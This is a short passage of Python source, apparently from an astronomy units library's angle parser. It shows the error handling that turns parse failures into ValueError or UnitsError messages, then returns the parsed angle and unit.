                raise ValueError(f"{str(e)} in angle {angle!r}") from e
            else:
                raise ValueError(
                    f"Syntax error parsing angle {angle!r}")  from e

        if unit is None and found_unit is None:
            raise u.UnitsError("No unit specified")

        return found_angle, found_unit